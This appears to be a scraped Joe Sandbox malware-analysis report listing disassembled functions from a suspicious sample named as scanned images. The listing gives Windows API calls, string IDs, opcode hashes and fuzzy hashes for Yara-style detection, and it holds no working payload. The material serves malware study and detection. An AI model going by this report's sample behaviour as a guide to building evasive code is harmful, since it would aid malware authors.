                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                                                                • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                • API String ID: 55579361-631824599
                                                                                • Opcode ID: 04fbb964ca9dc6cf24e49c894f75db9ed03618ce0fabea4d57f9faddb7b86bf5
                                                                                • Instruction ID: b165fa88654d4f79fdb1c207da81ad20c8a8e6b9fd4a6c41a636dca71f4ebf7e
                                                                                • Opcode Fuzzy Hash: 04fbb964ca9dc6cf24e49c894f75db9ed03618ce0fabea4d57f9faddb7b86bf5
                                                                                • Instruction Fuzzy Hash: 78E06D746017818FD3309FBDE4443967BE0AF10749F00897EE48ACA652EBB8F4498B99
                                                                                Function 0046E398 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __Init_thread_footer.LIBCMT ref: 0046E3D5
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Init_thread_footer
                                                                                • String ID: 0%R$8%R
                                                                                • API String ID: 1385522511-1208163964
                                                                                • Opcode ID: 3216ebf02290777d4ffcc38e480f80c18e89916e2420893660c66de946dad7cf
                                                                                • Instruction ID: 192d163576a5a28b1a8fef910b7ccd1ec82681ea315ee8f6f363b1437edbf6cd
                                                                                • Opcode Fuzzy Hash: 3216ebf02290777d4ffcc38e480f80c18e89916e2420893660c66de946dad7cf
                                                                                • Instruction Fuzzy Hash: BDE0203DA01920DBC61C971EF45498833D1FF16324F50816BE8018F3D1AB3C6C83954E
                                                                                Function 004C3017 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 004C302F
                                                                                • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 004C3044
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Temp$FileNamePath
                                                                                • String ID: aut
                                                                                • API String ID: 3285503233-3010740371
                                                                                • Opcode ID: 6c771bb8ec57b4a72a8db3c88af5280794dcc69338662c123c3341c52f21be19
                                                                                • Instruction ID: 10109a587ab56b56fc784c10b48f37be6144d1fe59c6ec2da445c025ffae92dc
                                                                                • Opcode Fuzzy Hash: 6c771bb8ec57b4a72a8db3c88af5280794dcc69338662c123c3341c52f21be19
                                                                                • Instruction Fuzzy Hash: 5BD05B7190031467DA2097949C8DFC73A6CEB04751F0001A17755D6091DAB09585CAD4
                                                                                Function 004AD21C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: LocalTime
                                                                                • String ID: %.3d$X64
                                                                                • API String ID: 481472006-1077770165
                                                                                • Opcode ID: 2a5b34ad3dadda6521407fcd3dd3eac2adda8816bbe192280fc0b39f910458e4
                                                                                • Instruction ID: b66fed9890a774e56c707c5a358819375f7beb90e593df7ebdb7d0c221a19af6
                                                                                • Opcode Fuzzy Hash: 2a5b34ad3dadda6521407fcd3dd3eac2adda8816bbe192280fc0b39f910458e4
                                                                                • Instruction Fuzzy Hash: 09D012B2C08109EACB5096D0DC85AF9B37CBB29301F5084A3F90791440E62CD54AE76B
                                                                                Function 004E2356 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 004E236C
                                                                                • PostMessageW.USER32(00000000), ref: 004E2373
                                                                                  • Part of subcall function 004BE97B: Sleep.KERNEL32 ref: 004BE9F3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: FindMessagePostSleepWindow
                                                                                • String ID: Shell_TrayWnd
                                                                                • API String ID: 529655941-2988720461
                                                                                • Opcode ID: 095c321e786470c3420157055fa3c0148efa198e3fc7abeb4f1973c0953d6a85
                                                                                • Instruction ID: 067cab65a2d3077fb69569742d7fe273ae2079c65e229c77fab35ec559622ae5
                                                                                • Opcode Fuzzy Hash: 095c321e786470c3420157055fa3c0148efa198e3fc7abeb4f1973c0953d6a85
                                                                                • Instruction Fuzzy Hash: E3D0C976381350BAE664A7719C8FFC66A14AB44B14F0049267645AA1D1C9A4B8468A58
                                                                                Function 004E2322 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 004E232C
                                                                                • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 004E233F
                                                                                  • Part of subcall function 004BE97B: Sleep.KERNEL32 ref: 004BE9F3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: FindMessagePostSleepWindow
                                                                                • String ID: Shell_TrayWnd
                                                                                • API String ID: 529655941-2988720461
                                                                                • Opcode ID: 086539ce94fedd3a70f98cb2a53cce9695973c840eea0c282314125459374f33
                                                                                • Instruction ID: 3d22147c3a388d6300c8463b1aae1e63fba9dd54ded6adf92df6c2c52a9c7130
                                                                                • Opcode Fuzzy Hash: 086539ce94fedd3a70f98cb2a53cce9695973c840eea0c282314125459374f33
                                                                                • Instruction Fuzzy Hash: 72D0A936380350BAE264A3319C8FFC66A04AB00B00F0009267205AA0D1C9A0A8028A18
                                                                                Function 0048BDFD Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 0048BE93
                                                                                • GetLastError.KERNEL32 ref: 0048BEA1
                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0048BEFC
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: ByteCharMultiWide$ErrorLast
                                                                                • String ID:
                                                                                • API String ID: 1717984340-0
                                                                                • Opcode ID: 03f72e62e8daa0af8ad40ed78671e00004084d7b2dfa36b5161312dce0e7ea4a
                                                                                • Instruction ID: 6bc79184ce2b0466bb176ad104b07fd7acbaf86b88d74cc85cdba2ab19560832
                                                                                • Opcode Fuzzy Hash: 03f72e62e8daa0af8ad40ed78671e00004084d7b2dfa36b5161312dce0e7ea4a
                                                                                • Instruction Fuzzy Hash: 8B41D835604206AFCF21AF65CC84ABF7BA5DF41310F14856AFB599B2A1DB348D01CB99